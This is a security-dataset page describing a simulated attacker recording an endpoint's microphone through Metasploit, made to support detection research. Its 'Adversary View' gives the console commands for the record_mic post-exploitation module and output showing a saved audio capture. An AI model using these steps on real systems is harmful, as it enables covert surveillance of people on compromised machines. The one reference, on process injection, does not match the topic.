Contents

MSF Record Mic

Contents

MSF Record Mic#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/06/09
Modification Date	2020/06/09
Tactics	TA0009
Techniques	T1123
Tags	Microphone Access

Dataset Description#

This dataset represents adversaries accessing the microphone of an endpoint.

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip

Simulation Metadata#

Tools#

type	Name	Module
C2	Metasploit	post

Adversary View#

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process